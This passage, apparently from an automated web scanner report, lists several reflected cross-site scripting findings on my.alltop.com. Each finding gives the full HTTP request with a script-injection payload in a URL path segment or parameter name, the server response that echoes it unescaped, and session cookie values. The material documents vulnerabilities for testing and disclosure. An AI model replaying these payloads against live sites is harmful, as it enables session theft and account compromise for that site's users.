Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:01 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012C)%3C/script%3E67394"><script>alert(1)</script>c90d49d4144" method="post" accept-charset="utf-8">
...[SNIP]...

1.121. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87c16"><script>alert(1)</script>1bd323d712d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C87c16"><script>alert(1)</script>1bd323d712d/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:31 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C87c16"><script>alert(1)</script>1bd323d712d/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.122. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67c40"><script>alert(1)</script>8cf96fa2db2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C/style%3E%3C67c40"><script>alert(1)</script>8cf96fa2db2/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:33 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C/style%3E%3C67c40"><script>alert(1)</script>8cf96fa2db2/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.123. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fe5c"><script>alert(1)</script>d6e1cb712d0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C5fe5c"><script>alert(1)</script>d6e1cb712d0/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:34 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:34 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:34 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C5fe5c"><script>alert(1)</script>d6e1cb712d0/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.124. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9dcb"><script>alert(1)</script>1b77e34e5b3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3Ed9dcb"><script>alert(1)</script>1b77e34e5b3 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:35 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3Ed9dcb"><script>alert(1)</script>1b77e34e5b3" method="post" accept-charset="utf-8">
...[SNIP]...

1.125. http://my.alltop.com/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f253d"><script>alert(1)</script>62456625d17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E?f253d"><script>alert(1)</script>62456625d17=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:27 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:27 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:27 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000187)%3C/script%3E?f253d"><script>alert(1)</script>62456625d17=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.126. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%22ns=%22netsparker(0x000191)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 610f9"><script>alert(1)</script>96010d42753 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g610f9"><script>alert(1)</script>96010d42753/%22ns=%22netsparker(0x000191) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:37 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:38 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:38 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g610f9"><script>alert(1)</script>96010d42753/%22ns=%22netsparker(0x000191)" method="post" accept-charset="utf-8">
...[SNIP]...

1.127. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%22ns=%22netsparker(0x000191)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1103"><script>alert(1)</script>39c215705e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g/%22nsd1103"><script>alert(1)</script>39c215705e7=%22netsparker(0x000191) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:41 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:41 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g/%22nsd1103"><script>alert(1)</script>39c215705e7=%22netsparker(0x000191)" method="post" accept-charset="utf-8">
...[SNIP]...

1.128. http://my.alltop.com/alpha/g/%22ns=%22netsparker(0x000191) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g/%22ns=%22netsparker(0x000191)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53d96"><script>alert(1)</script>645dacf2bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g/%22ns=%22netsparker(0x000191)?53d96"><script>alert(1)</script>645dacf2bc=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
